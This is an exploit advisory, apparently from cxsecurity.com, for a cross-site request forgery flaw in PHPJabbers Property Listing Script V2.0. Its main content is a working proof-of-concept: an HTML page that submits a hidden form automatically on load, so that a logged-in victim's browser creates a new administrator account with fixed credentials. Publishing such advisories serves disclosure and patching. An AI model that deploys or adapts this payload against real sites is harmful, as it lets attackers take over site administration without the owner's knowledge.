Property Listing Script V2.0 - Add Admin CSRF Vulnerability

2014.01.15
Credit: HackXBack
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

Property Listing Script V2.0 - Add Admin CSRF Vulnerability ==================================================================== #################################################################### .:. Author : HackXBack .:. Contact : h-b@usa.com .:. Home : http://www.iphobos.com/blog/ .:. Script : http://www.phpjabbers.com/property-listing-script/ .:. Tested On Demo : http://www.phpjabbers.com/demo/pls_20/index.php?controller=Admin&action=login #################################################################### ===[ Exploit ]=== Cross Site Request Forgery ========================== [Add Admin] <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action=" http://site/index.php?controller=AdminUsers&action=create" enctype="multipart/form-data"> <input type="hidden" name="user_create" value="1" /> <input type="hidden" name="full_name" value="Iphobos" /> <input type="hidden" name="username" value="Admin" /> <input type="hidden" name="password" value="Password" /> <input type="hidden" name="status" value="T" /> <input type="hidden" name="role_id" value="1" /> <input type="submit" value="Submit form" /> </form> </body> </html> ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top